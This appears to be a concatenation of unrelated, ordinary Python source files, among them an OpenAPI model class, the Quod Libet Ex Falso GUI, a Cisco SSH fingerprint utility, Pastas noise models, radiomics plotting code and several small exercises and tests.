def id(self, id):
"""Sets the id of this GroupApplication.
:param id: The id of this GroupApplication. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and id is None: # noqa: E501
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def player(self):
"""Gets the player of this GroupApplication. # noqa: E501
:return: The player of this GroupApplication. # noqa: E501
:rtype: Player
"""
return self._player
@player.setter
def player(self, player):
"""Sets the player of this GroupApplication.
:param player: The player of this GroupApplication. # noqa: E501
:type: Player
"""
if self.local_vars_configuration.client_side_validation and player is None: # noqa: E501
raise ValueError("Invalid value for `player`, must not be `None`") # noqa: E501
self._player = player
@property
def group(self):
"""Gets the group of this GroupApplication. # noqa: E501
:return: The group of this GroupApplication. # noqa: E501
:rtype: Group
"""
return self._group
@group.setter
def group(self, group):
"""Sets the group of this GroupApplication.
:param group: The group of this GroupApplication. # noqa: E501
:type: Group
"""
if self.local_vars_configuration.client_side_validation and group is None: # noqa: E501
raise ValueError("Invalid value for `group`, must not be `None`") # noqa: E501
self._group = group
@property
def created(self):
"""Gets the created of this GroupApplication. # noqa: E501
:return: The created of this GroupApplication. # noqa: E501
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this GroupApplication.
:param created: The created of this GroupApplication. # noqa: E501
:type: datetime
"""
self._created = created
@property
def status(self):
"""Gets the status of this GroupApplication. # noqa: E501
Group application status. # noqa: E501
:return: The status of this GroupApplication. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this GroupApplication.
Group application status. # noqa: E501
:param status: The status of this GroupApplication. # noqa: E501
:type: str
"""
allowed_values = ["pending", "accepted", "denied"] # noqa: E501
if self.local_vars_configuration.client_side_validation and status not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GroupApplication):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, GroupApplication):
return True
return self.to_dict() != other.to_dict()
|
from django.apps import AppConfig
class RouterConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'my_router'
def ready(self):
import my_router.receivers # noqa
|
# -*- coding: utf-8 -*-
# Copyright 2004-2005 Joe Wreschnig, Michael Urman, Iñigo Serna
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation
import os
from gi.repository import Gtk, GObject, Pango
from quodlibet.qltk.msg import confirm_action
from quodlibet import config
from quodlibet import const
from quodlibet import formats
from quodlibet import qltk
from quodlibet import util
from quodlibet.plugins import PluginManager
from quodlibet.qltk.ccb import ConfigCheckButton
from quodlibet.qltk.delete import trash_files, TrashMenuItem
from quodlibet.qltk.edittags import EditTags
from quodlibet.qltk.filesel import MainFileSelector, FileSelector
from quodlibet.qltk.pluginwin import PluginWindow
from quodlibet.qltk.renamefiles import RenameFiles
from quodlibet.qltk.tagsfrompath import TagsFromPath
from quodlibet.qltk.tracknumbers import TrackNumbers
from quodlibet.qltk.entry import UndoEntry
from quodlibet.qltk.about import AboutExFalso
from quodlibet.qltk.songsmenu import SongsMenuPluginHandler
from quodlibet.qltk.x import Alignment, SeparatorMenuItem, ConfigRHPaned
from quodlibet.qltk.window import PersistentWindowMixin, Window
from quodlibet.util.path import mtime, normalize_path
class ExFalsoWindow(Window, PersistentWindowMixin):
__gsignals__ = {
'changed': (GObject.SignalFlags.RUN_LAST,
None, (object,)),
'artwork-changed': (GObject.SignalFlags.RUN_LAST,
None, (object,))
}
pm = SongsMenuPluginHandler(confirm_action)
@classmethod
def init_plugins(cls):
PluginManager.instance.register_handler(cls.pm)
def __init__(self, library, dir=None):
super(ExFalsoWindow, self).__init__(dialog=False)
self.set_title("Ex Falso")
self.set_default_size(750, 475)
self.enable_window_tracking("exfalso")
self.__library = library
hp = ConfigRHPaned("memory", "exfalso_paned_position", 1.0)
hp.set_border_width(0)
hp.set_position(250)
hp.show()
self.add(hp)
vb = Gtk.VBox()
bbox = Gtk.HBox(spacing=6)
about = Gtk.Button()
about.add(Gtk.Image.new_from_stock(
Gtk.STOCK_ABOUT, Gtk.IconSize.BUTTON))
about.connect_object('clicked', self.__show_about, self)
bbox.pack_start(about, False, True, 0)
prefs = Gtk.Button()
prefs.add(Gtk.Image.new_from_stock(
Gtk.STOCK_PREFERENCES, Gtk.IconSize.BUTTON))
def prefs_cb(button):
window = PreferencesWindow(self)
window.show()
prefs.connect('clicked', prefs_cb)
bbox.pack_start(prefs, False, True, 0)
plugins = qltk.Button(_("_Plugins"), Gtk.STOCK_EXECUTE)
def plugin_window_cb(button):
window = PluginWindow(self)
window.show()
plugins.connect('clicked', plugin_window_cb)
bbox.pack_start(plugins, False, True, 0)
l = Gtk.Label()
l.set_alignment(1.0, 0.5)
l.set_ellipsize(Pango.EllipsizeMode.END)
bbox.pack_start(l, True, True, 0)
fs = MainFileSelector()
vb.pack_start(fs, True, True, 0)
vb.pack_start(Alignment(bbox, border=6), False, True, 0)
vb.show_all()
hp.pack1(vb, resize=True, shrink=False)
nb = qltk.Notebook()
nb.props.scrollable = True
nb.show()
for Page in [EditTags, TagsFromPath, RenameFiles, TrackNumbers]:
page = Page(self, self.__library)
page.show()
nb.append_page(page)
align = Alignment(nb, top=3)
align.show()
hp.pack2(align, resize=True, shrink=False)
fs.connect('changed', self.__changed, l)
if dir:
fs.go_to(dir)
s = self.__library.connect('changed', lambda *x: fs.rescan())
self.connect_object('destroy', self.__library.disconnect, s)
self.__save = None
self.connect_object('changed', self.set_pending, None)
for c in fs.get_children():
c.get_child().connect('button-press-event',
self.__pre_selection_changed, fs, nb)
c.get_child().connect('focus',
self.__pre_selection_changed, fs, nb)
fs.get_children()[1].get_child().connect('popup-menu',
self.__popup_menu, fs)
self.emit('changed', [])
self.get_child().show()
self.__ag = Gtk.AccelGroup()
key, mod = Gtk.accelerator_parse("<control>Q")
self.__ag.connect(key, mod, 0, lambda *x: self.destroy())
self.add_accel_group(self.__ag)
def __show_about(self, window):
about = AboutExFalso(self)
about.run()
about.destroy()
def set_pending(self, button, *excess):
self.__save = button
def __pre_selection_changed(self, view, event, fs, nb):
if self.__save:
resp = qltk.CancelRevertSave(self).run()
if resp == Gtk.ResponseType.YES:
self.__save.clicked()
elif resp == Gtk.ResponseType.NO:
fs.rescan()
else:
nb.grab_focus()
return True # cancel or closed
def __popup_menu(self, view, fs):
# get all songs for the selection
filenames = [normalize_path(f, canonicalise=True)
for f in fs.get_selected_paths()]
maybe_songs = [self.__library.get(f) for f in filenames]
songs = [s for s in maybe_songs if s]
if songs:
menu = self.pm.Menu(self.__library, self, songs)
if menu is None:
menu = Gtk.Menu()
else:
menu.prepend(SeparatorMenuItem())
else:
menu = Gtk.Menu()
b = TrashMenuItem()
b.connect('activate', self.__delete, filenames, fs)
menu.prepend(b)
menu.connect_object('selection-done', Gtk.Menu.destroy, menu)
menu.show_all()
return view.popup_menu(menu, 0, Gtk.get_current_event_time())
def __delete(self, item, paths, fs):
trash_files(self, paths)
fs.rescan()
def __changed(self, selector, selection, label):
model, rows = selection.get_selected_rows()
files = []
if len(rows) < 2:
count = len(model or [])
else:
count = len(rows)
label.set_text(ngettext("%d song", "%d songs", count) % count)
for row in rows:
filename = model[row][0]
if not os.path.exists(filename):
pass
elif filename in self.__library:
file = self.__library[filename]
if file("~#mtime") + 1. < mtime(filename):
try:
file.reload()
except StandardError:
pass
files.append(file)
else:
files.append(formats.MusicFile(filename))
files = filter(None, files)
if len(files) == 0:
self.set_title("Ex Falso")
elif len(files) == 1:
self.set_title("%s - Ex Falso" % files[0].comma("title"))
else:
self.set_title(
"%s - Ex Falso" %
(ngettext("%(title)s and %(count)d more",
"%(title)s and %(count)d more",
len(files) - 1) % (
{'title': files[0].comma("title"), 'count': len(files) - 1})))
self.__library.add(files)
self.emit('changed', files)
class PreferencesWindow(qltk.UniqueWindow):
def __init__(self, parent):
if self.is_not_unique():
return
super(PreferencesWindow, self).__init__()
self.set_title(_("Ex Falso Preferences"))
self.set_border_width(12)
self.set_resizable(False)
self.set_transient_for(parent)
vbox = Gtk.VBox(spacing=6)
hb = Gtk.HBox(spacing=6)
e = UndoEntry()
e.set_text(config.get("editing", "split_on"))
e.connect('changed', self.__changed, 'editing', 'split_on')
l = Gtk.Label(label=_("Split _on:"))
l.set_use_underline(True)
l.set_mnemonic_widget(e)
hb.pack_start(l, False, True, 0)
hb.pack_start(e, True, True, 0)
cb = ConfigCheckButton(
_("Show _programmatic tags"), 'editing', 'alltags',
tooltip=_("Access all tags, including machine-generated "
"ones e.g. MusicBrainz or Replay Gain tags"))
cb.set_active(config.getboolean("editing", 'alltags'))
vbox.pack_start(hb, False, True, 0)
vbox.pack_start(cb, False, True, 0)
f = qltk.Frame(_("Tag Editing"), child=vbox)
close = Gtk.Button(stock=Gtk.STOCK_CLOSE)
close.connect_object('clicked', lambda x: x.destroy(), self)
button_box = Gtk.HButtonBox()
button_box.set_layout(Gtk.ButtonBoxStyle.END)
button_box.pack_start(close, True, True, 0)
main_vbox = Gtk.VBox(spacing=12)
main_vbox.pack_start(f, True, True, 0)
main_vbox.pack_start(button_box, False, True, 0)
self.add(main_vbox)
self.connect_object('destroy', PreferencesWindow.__destroy, self)
self.get_child().show_all()
def __changed(self, entry, section, name):
config.set(section, name, entry.get_text())
def __destroy(self):
config.write(const.CONFIG)
|
import os
os.system("mkdir data")
os.system("wget https://www.dropbox.com/s/zcwlujrtz3izcw8/gender.tgz data/")
os.system("tar xvzf gender.tgz -C data/")
os.system("rm gender.tgz")
|
from setuptools import setup, find_packages
PROJECT_URL = 'https://github.com/pfalcon/sphinx_selective_exclude'
VERSION = '1.0.3'
setup(
name='sphinx_selective_exclude',
version=VERSION,
url=PROJECT_URL,
download_url=PROJECT_URL + '/tarball/' + VERSION,
license='MIT license',
author='Paul Sokolovsky',
author_email='pfalcon@users.sourceforge.net',
description='Sphinx eager ".. only::" directive and other selective rendition extensions',
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Documentation',
'Topic :: Utilities',
],
platforms='any',
packages=find_packages(),
include_package_data=True,
install_requires=None,
namespace_packages=[],
keywords = ['sphinx', 'only', 'plugin'],
)
|
# Crie um programa que leia quanto dinheiro uma pessoa tem na carteira e mostre quantos dólares ela pode comprar.
# considere US$1,00 = R$5,58
real = float(input('Quando dinheiro você tem na carteira? '))
dolar = real / 5.58
print('Com R${:.2f} você pode comprar US${:.2f}'.format(real, dolar))
|
import AppKit
from PyObjCTools.TestSupport import TestCase
class TestNSInterfaceStyle(TestCase):
def testConstants(self):
self.assertEqual(AppKit.NSNoInterfaceStyle, 0)
self.assertEqual(AppKit.NSNextStepInterfaceStyle, 1)
self.assertEqual(AppKit.NSWindows95InterfaceStyle, 2)
self.assertEqual(AppKit.NSMacintoshInterfaceStyle, 3)
self.assertIsInstance(AppKit.NSInterfaceStyleDefault, str)
def testFunctions(self):
v = AppKit.NSInterfaceStyleForKey("button", None)
self.assertIsInstance(v, int)
|
#f __name__ == "__main__":
def Pomodoro(time):
if time == 0:
return 25*60
elif time > 120:
return 25*60
return time*60
|
import numpy as np
from sklearn.base import clone
from sklearn.metrics import accuracy_score
from python_ml.Ensemble.Combination.VotingSchemes import majority_voting
class RandomSubspace(object):
def __init__(self, base_classifier, pool_size, percentage=0.5):
self.has_been_fit = False
self.pool_size = pool_size
self.percentage = percentage
self.classifiers = []
for i in range(self.pool_size):
self.classifiers.append(clone(base_classifier))
self.training_sets = []
self.selected_features = []
def _generate_set(self, X, y):
num_features_original = X.shape[1]
if self.pool_size == 1:
X_set = X
y_set = y
self.selected_features.append(np.arange(num_features_original))
else:
idx = np.random.choice(num_features_original, int(np.round(self.percentage * num_features_original)), replace=False)
X_set = X[:, idx]
y_set = y[:]
self.selected_features.append(idx)
return X_set, y_set
def fit(self, X, y):
if not self.has_been_fit:
for i, clf in enumerate(self.classifiers):
X_this, y_this = self._generate_set(X, y)
clf.fit(X_this, y_this)
self.has_been_fit = True
def predict(self, X, voting_scheme='majority vote'):
if not self.has_been_fit:
raise Exception('Classifier has not been fit')
if isinstance(voting_scheme,str):
if voting_scheme == 'majority vote':
voting_scheme = majority_voting
predictions = []
for i, clf in enumerate(self.classifiers):
selected_features = self.selected_features[i]
predictions.append(clf.predict(X[:,selected_features]))
predictions = np.array(predictions).T
return voting_scheme(predictions)
def score(self,X,y):
return accuracy_score(y, self.predict(X))
|
#!/usr/bin/env python
__description__ = 'Calculate the SSH fingerprint from a Cisco public key dumped with command "show crypto key mypubkey rsa"'
__author__ = 'Didier Stevens'
__version__ = '0.0.2'
__date__ = '2014/08/19'
"""
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2011/12/20: start
2011/12/30: added SplitPerXCharacters
2014/08/19: fixed bug MatchLength
Todo:
"""
import optparse
import struct
import hashlib
def IsHexDigit(string):
if string == '':
return False
for char in string:
if not (char.isdigit() or char.lower() >= 'a' and char.lower() <= 'f'):
return False
return True
def HexDumpFile2Data(filename):
try:
f = open(filename, 'r')
except:
return None
try:
hex = ''.join(line.replace('\n', '').replace(' ', '') for line in f.readlines())
if not IsHexDigit(hex):
return None
if len(hex) % 2 != 0:
return None
return ''.join(map(lambda x, y: chr(int(x+y, 16)), hex[::2], hex[1::2]))
finally:
f.close()
def MatchByte(byte, data):
if len(data) < 1:
return (data, False)
if ord(data[0]) != byte:
return (data, False)
return (data[1:], True)
def MatchLength(data):
if len(data) < 1:
return (data, False, 0)
if ord(data[0]) <= 0x80: #a# check 80
return (data[1:], True, ord(data[0]))
countBytes = ord(data[0]) - 0x80
data = data[1:]
if len(data) < countBytes:
return (data, False, 0)
length = 0
for index in range(0, countBytes):
length = ord(data[index]) + length * 0x100
return (data[countBytes:], True, length)
def MatchString(string, data):
if len(data) < len(string):
return (data, False)
if data[:len(string)] != string:
return (data, False)
return (data[len(string):], True)
def ParsePublicKeyDER(data):
data, match = MatchByte(0x30, data)
if not match:
print('Parse error: expected sequence (0x30)')
return None
data, match, length = MatchLength(data)
if not match:
print('Parse error: expected length')
return None
if length > len(data):
print('Parse error: incomplete DER encoded key 1: %d' % length)
return None
data, match = MatchString('\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x01\x05\x00', data)
if not match:
print('Parse error: expected OID rsaEncryption')
return None
data, match = MatchByte(0x03, data)
if not match:
print('Parse error: expected bitstring (0x03)')
return None
data, match, length = MatchLength(data)
if not match:
print('Parse error: expected length')
return None
if length > len(data):
print('Parse error: incomplete DER encoded key 2: %d' % length)
return None
data, match = MatchByte(0x00, data)
if not match:
print('Parse error: expected no padding (0x00)')
return None
data, match = MatchByte(0x30, data)
if not match:
print('Parse error: expected sequence (0x30)')
return None
data, match, length = MatchLength(data)
if not match:
print('Parse error: expected length')
return None
if length > len(data):
print('Parse error: incomplete DER encoded key 3: %d' % length)
return None
data, match = MatchByte(0x02, data)
if not match:
print('Parse error: expected integer (0x02)')
return None
data, match, length = MatchLength(data)
if not match:
print('Parse error: expected length')
return None
if length > len(data):
print('Parse error: incomplete DER encoded key 4: %d' % length)
return None
modulus = data[:length]
data = data[length:]
data, match = MatchByte(0x02, data)
if not match:
print('Parse error: expected integer (0x02)')
return None
data, match, length = MatchLength(data)
if not match:
print('Parse error: expected length')
return None
if length > len(data):
print('Parse error: incomplete DER encoded key 5: %d' % length)
return None
exponent = data[:length]
return (modulus, exponent)
def LengthEncode(data):
return struct.pack('>I', len(data)) + data
def CalcFingerprint(modulus, exponent):
data = LengthEncode('ssh-rsa') + LengthEncode(exponent) + LengthEncode(modulus)
return hashlib.md5(data).hexdigest()
def SplitPerXCharacters(string, count):
return [string[iter:iter+count] for iter in range(0, len(string), count)]
def CiscoCalculateSSHFingerprint(filename):
publicKeyDER = HexDumpFile2Data(filename)
if publicKeyDER == None:
print('Error reading public key')
return
result = ParsePublicKeyDER(publicKeyDER)
if result == None:
return
fingerprint = CalcFingerprint(result[0], result[1])
print(':'.join(SplitPerXCharacters(fingerprint, 2)))
def Main():
oParser = optparse.OptionParser(usage='usage: %prog file\n' + __description__, version='%prog ' + __version__)
(options, args) = oParser.parse_args()
if len(args) != 1:
oParser.print_help()
print('')
print(' Source code put in the public domain by Didier Stevens, no Copyright')
print(' Use at your own risk')
print(' https://DidierStevens.com')
return
else:
CiscoCalculateSSHFingerprint(args[0])
if __name__ == '__main__':
Main()
|
"""
10
Enunciado
Faça um programa que sorteie 10 números entre 0 e 100 e imprima:
a. o maior número sorteado;
b. o menor número sorteado;
c. a média dos números sorteados;
d. a soma dos números sorteados.
"""
import random
lista = []
for c in range(0, 10):
numeros = random.randint(0, 100)
lista.append(numeros)
print(lista)
print(max(lista))
print(min(lista))
soma = 0
for c in lista:
soma = soma + c
media = soma/len(lista)
print(media)
print(soma) |
"""The noisemodels module contains all noisemodels available in Pastas.
Author: R.A. Collenteur, 2017
"""
from abc import ABC
from logging import getLogger
import numpy as np
import pandas as pd
from .decorators import set_parameter
logger = getLogger(__name__)
__all__ = ["NoiseModel", "NoiseModel2"]
class NoiseModelBase(ABC):
_name = "NoiseModelBase"
def __init__(self):
self.nparam = 0
self.name = "noise"
self.parameters = pd.DataFrame(
columns=["initial", "pmin", "pmax", "vary", "name"])
def set_init_parameters(self, oseries=None):
if oseries is not None:
pinit = oseries.index.to_series().diff() / pd.Timedelta(1, "d")
pinit = pinit.median()
else:
pinit = 14.0
self.parameters.loc["noise_alpha"] = (pinit, 0, 5000, True, "noise")
@set_parameter
def set_initial(self, name, value):
"""Internal method to set the initial parameter value
Notes
-----
The preferred method for parameter setting is through the model.
"""
if name in self.parameters.index:
self.parameters.loc[name, "initial"] = value
else:
print("Warning:", name, "does not exist")
@set_parameter
def set_pmin(self, name, value):
"""Internal method to set the minimum value of the noisemodel.
Notes
-----
The preferred method for parameter setting is through the model.
"""
if name in self.parameters.index:
self.parameters.loc[name, "pmin"] = value
else:
print("Warning:", name, "does not exist")
@set_parameter
def set_pmax(self, name, value):
"""Internal method to set the maximum parameter values.
Notes
-----
The preferred method for parameter setting is through the model.
"""
if name in self.parameters.index:
self.parameters.loc[name, "pmax"] = value
else:
print("Warning:", name, "does not exist")
@set_parameter
def set_vary(self, name, value):
"""Internal method to set if the parameter is varied during
optimization.
Notes
-----
The preferred method for parameter setting is through the model.
"""
self.parameters.loc[name, "vary"] = value
def to_dict(self):
return {"type": self._name}
class NoiseModel(NoiseModelBase):
"""Noise model with exponential decay of the residual and
weighting with the time step between observations.
Notes
-----
Calculates the noise [1]_ according to:
.. math::
v(t1) = r(t1) - r(t0) * exp(- (t1 - t0) / alpha)
Note that in the referenced paper, alpha is defined as the inverse of
alpha used in Pastas. The unit of the alpha parameter is always in days.
Examples
--------
It can happen that the noisemodel is used during model calibration
to explain most of the variation in the data. A recommended solution is to
scale the initial parameter with the model timestep, E.g.::
>>> n = NoiseModel()
>>> n.set_initial("noise_alpha", 1.0 * ml.get_dt(ml.freq))
References
----------
.. [1] von Asmuth, J. R., and M. F. P. Bierkens (2005), Modeling irregularly spaced residual series as a continuous stochastic process, Water Resour. Res., 41, W12404, doi:10.1029/2004WR003726.
"""
_name = "NoiseModel"
def __init__(self):
NoiseModelBase.__init__(self)
self.nparam = 1
self.set_init_parameters()
def simulate(self, res, parameters):
"""
Parameters
----------
res : pandas.Series
The residual series.
parameters : array-like, optional
Alpha parameters used by the noisemodel.
Returns
-------
noise: pandas.Series
Series of the noise.
"""
alpha = parameters[0]
odelt = (res.index[1:] - res.index[:-1]).values / pd.Timedelta("1d")
# res.values is needed else it gets messed up with the dates
v = res.values[1:] - np.exp(-odelt / alpha) * res.values[:-1]
res.iloc[1:] = v * self.weights(alpha, odelt)
res.iloc[0] = 0
res.name = "Noise"
return res
@staticmethod
def weights(alpha, odelt):
"""Method to calculate the weights for the noise based on the
sum of weighted squared noise (SWSI) method.
Parameters
----------
alpha
odelt:
Returns
-------
"""
# divide power by 2 as nu / sigma is returned
power = 1.0 / (2.0 * odelt.size)
exp = np.exp(-2.0 / alpha * odelt) # Twice as fast as 2*odelt/alpha
w = np.exp(power * np.sum(np.log(1.0 - exp))) / np.sqrt(1.0 - exp)
return w
class NoiseModel2(NoiseModelBase):
"""
Noise model with exponential decay of the residual.
Notes
-----
Calculates the noise according to:
.. math::
v(t1) = r(t1) - r(t0) * exp(- (t1 - t0) / alpha)
The unit of the alpha parameter is always in days.
Examples
--------
It can happen that the noisemodel is used during model calibration
to explain most of the variation in the data. A recommended solution is to
scale the initial parameter with the model timestep, E.g.::
>>> n = NoiseModel()
>>> n.set_initial("noise_alpha", 1.0 * ml.get_dt(ml.freq))
"""
_name = "NoiseModel2"
def __init__(self):
NoiseModelBase.__init__(self)
self.nparam = 1
self.set_init_parameters()
@staticmethod
def simulate(res, parameters):
"""
Parameters
----------
res : pandas.Series
The residual series.
parameters : array_like, optional
Alpha parameters used by the noisemodel.
Returns
-------
noise: pandas.Series
Series of the noise.
"""
alpha = parameters[0]
odelt = (res.index[1:] - res.index[:-1]).values / pd.Timedelta("1d")
# res.values is needed else it gets messed up with the dates
v = res.values[1:] - np.exp(-odelt / alpha) * res.values[:-1]
res.iloc[1:] = v
res.iloc[0] = 0
res.name = "Noise"
return res
|
import functools
import logging
import warnings
from pathlib import Path
from typing import List, Optional
import monai.transforms.utils as monai_utils
import numpy as np
import plotly.express as px
import plotly.graph_objects as go
import skimage
from sklearn.pipeline import Pipeline
from autorad.config.type_definitions import PathLike
from autorad.utils import io, spatial
from autorad.visualization import plotly_utils
# suppress skimage
warnings.filterwarnings(action="ignore", category=UserWarning)
log = logging.getLogger(__name__)
class Cropper:
"""Performs non-zero cropping"""
def __init__(self, bbox_size=50, margin=20):
self.bbox_size = bbox_size
self.margin = margin
self.coords_start = None
self.coords_end = None
def fit(self, X: np.ndarray, y=None, constant_bbox=False):
"""X is a binary mask"""
expanded_mask = np.expand_dims(X, axis=0)
if constant_bbox:
select_fn = functools.partial(
spatial.generate_bbox_around_mask_center,
bbox_size=self.bbox_size,
)
else:
select_fn = monai_utils.is_positive
(
self.coords_start,
self.coords_end,
) = monai_utils.generate_spatial_bounding_box(
img=expanded_mask,
select_fn=select_fn,
margin=[self.margin, self.margin, self.margin],
)
return self
def transform(self, volume: np.ndarray):
log.info(
f"Cropping the image of size {volume.shape} to the region from \
{self.coords_start} to {self.coords_end}"
)
return spatial.crop_volume_from_coords(
self.coords_start, self.coords_end, volume
)
class Slicer:
"""Given a 3D volume, finds its largest cross-section"""
def __init__(self, axis=2):
self.slicenum = None
self.axis = axis
def fit(self, X: np.ndarray, y=None):
"""X is a binary mask"""
slicenum = spatial.get_largest_cross_section(X, axis=self.axis)
self.slicenum = slicenum
return self
def transform(self, volume: np.ndarray):
indices = [slice(None)] * 3
indices[self.axis] = self.slicenum
return volume[tuple(indices)]
def normalize_roi(image_array, mask_array):
image_values = image_array[mask_array > 0]
roi_max = np.max(image_values)
roi_min = np.min(image_values)
image_clipped = np.clip(image_array, roi_min, roi_max)
image_norm = (image_clipped - roi_min) / (roi_max - roi_min)
return image_norm
def overlay_mask_contour(
image_2D: np.ndarray,
mask_2D: np.ndarray,
label: int = 1,
color=(1, 0, 0), # red
normalize=False,
):
mask_to_plot = mask_2D == label
if normalize:
image_2D = normalize_roi(image_2D, mask_to_plot)
image_to_plot = skimage.img_as_ubyte(image_2D)
result_image = skimage.segmentation.mark_boundaries(
image_to_plot, mask_to_plot, mode="outer", color=color
)
return result_image
def plot_compare_two_masks(
image_path, manual_mask_path, auto_mask_path, axis=2
):
manual_vols = BaseVolumes.from_nifti(
image_path,
manual_mask_path,
constant_bbox=True,
resample=True,
axis=axis,
)
auto_vols = BaseVolumes.from_nifti(
image_path,
auto_mask_path,
constant_bbox=True,
resample=True,
axis=axis,
)
image_2D, manual_mask_2D = manual_vols.get_slices()
auto_mask_2D = manual_vols.crop_and_slice(auto_vols.mask)
img_one_contour = overlay_mask_contour(
image_2D,
manual_mask_2D,
)
img_two_contours = overlay_mask_contour(
img_one_contour,
auto_mask_2D,
color=(0, 0, 1), # blue
)
fig = px.imshow(img_two_contours)
fig.update_layout(width=800, height=800)
plotly_utils.hide_labels(fig)
return fig
class BaseVolumes:
"""Loading and processing of image and mask volumes."""
def __init__(
self,
image,
mask,
label=1,
constant_bbox=False,
window="soft tissues",
axis=2,
):
self.image_raw = image
if window is None:
self.image = skimage.exposure.rescale_intensity(image)
else:
self.image = spatial.window_with_preset(
self.image_raw, window=window
)
self.mask = mask == label
self.axis = axis
self.preprocessor = self.init_and_fit_preprocessor(constant_bbox)
def init_and_fit_preprocessor(self, constant_bbox=False):
preprocessor = Pipeline(
[
("cropper", Cropper()),
("slicer", Slicer(axis=self.axis)),
]
)
preprocessor.fit(
self.mask,
cropper__constant_bbox=constant_bbox,
)
return preprocessor
@classmethod
def from_nifti(
cls,
image_path: PathLike,
mask_path: PathLike,
resample=False,
*args,
**kwargs,
):
if resample:
mask, image = spatial.load_and_resample_to_match(
to_resample=mask_path,
reference=image_path,
)
else:
image = io.load_image(image_path)
mask = io.load_image(mask_path)
return cls(image, mask, *args, **kwargs)
def crop_and_slice(self, volume: np.ndarray):
result = self.preprocessor.transform(volume)
return result
def get_slices(self):
image_2D = self.crop_and_slice(self.image)
mask_2D = self.crop_and_slice(self.mask)
return image_2D, mask_2D
def plot_image(self):
image_2D, _ = self.get_slices()
fig = px.imshow(image_2D, color_continuous_scale="gray")
plotly_utils.hide_labels(fig)
return fig
class FeaturePlotter:
"""Plotting of voxel-based radiomics features."""
def __init__(self, image_path, mask_path, feature_map: dict):
self.volumes = BaseVolumes.from_nifti(
image_path, mask_path, constant_bbox=True
)
self.feature_map = feature_map
self.feature_names = list(feature_map.keys())
@classmethod
def from_dir(cls, dir_path: str, feature_names: List[str]):
dir_path_obj = Path(dir_path)
image_path = dir_path_obj / "image.nii.gz"
mask_path = dir_path_obj / "segmentation.nii.gz"
feature_map = {}
for name in feature_names:
nifti_path = dir_path_obj / f"{name}.nii.gz"
try:
feature_map[name] = spatial.load_and_resample_to_match(
nifti_path, image_path, interpolation="bilinear"
)
except FileNotFoundError:
raise FileNotFoundError(
f"Could not load feature map {name} in {dir_path}"
)
return cls(image_path, mask_path, feature_map)
def plot_single_feature(
self,
feature_name: str,
feature_range: Optional[tuple[float, float]] = None,
):
image_2D, mask_2D = self.volumes.get_slices()
feature_2D = self.volumes.crop_and_slice(
self.feature_map[feature_name]
)
feature_2D[mask_2D == 0] = np.nan
fig = px.imshow(image_2D, color_continuous_scale="gray")
plotly_utils.hide_labels(fig)
# Plot mask on top of fig, without margins
heatmap_options = {
"z": feature_2D,
"showscale": False,
"colorscale": "Spectral",
}
if feature_range:
heatmap_options["zmin"] = feature_range[0]
heatmap_options["zmax"] = feature_range[1]
fig.add_trace(go.Heatmap(**heatmap_options))
return fig
def plot_all_features(self, output_dir, param_ranges):
fig = self.volumes.plot_image()
fig.write_image(Path(output_dir) / "image.png")
for name, param_range in zip(self.feature_names, param_ranges):
fig = self.plot_single_feature(name, param_range)
fig.write_image(Path(output_dir) / f"{name}.png")
|
import cv2
import os
import sys
def facecrop(image):
cascPath = "C:\Python36\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml"
cascade = cv2.CascadeClassifier(cascPath)
img = cv2.imread(image)
minisize = (img.shape[1],img.shape[0])
miniframe = cv2.resize(img, minisize)
faces = cascade.detectMultiScale(miniframe)
counter = 0
for f in faces:
x, y, w, h = [ v for v in f ]
cv2.rectangle(img, (x,y), (x+w,y+h), (255,255,255))
sub_face = img[y:y+h, x:x+w]
cv2.imwrite("cropped_"+str(counter)+".jpg", sub_face)
counter += 1
return |
import sys
def num_nice(input):
return len([s for s in input.split('\n') if is_nice(s)])
def is_nice(s):
return has_non_overlapping_pairs(s) and has_repeat_with_gap(s)
def has_non_overlapping_pairs(s):
for i in xrange(0, len(s) - 3):
needle = s[i:i+2]
haystack = s[i+2:]
if needle in haystack:
return True
return False
def has_repeat_with_gap(s):
for i in xrange(0, len(s) - 2):
if s[i + 2] == s[i]:
return True
return False
if __name__ == "__main__":
print num_nice(sys.stdin.read())
|
from typing import Iterator
import xmlschema
from xmlschema import XsdElement, XsdComponent
def test_validate(config_folder, fixtures_path):
schema = xmlschema.XMLSchema(config_folder / 'cin.xsd')
errors = list(schema.iter_errors(fixtures_path / 'sample.xml'))
for error in errors:
print(error)
assert len(errors) == 0
class parents(Iterator[XsdComponent]):
def __init__(self, node: XsdComponent):
self._node = node
def __next__(self) -> XsdComponent:
try:
self._node = self._node.parent
except AttributeError:
self._node = None
if self._node is None:
raise StopIteration()
return self._node
def test_print_schema(config_folder):
schema = xmlschema.XMLSchema(config_folder / 'cin.xsd')
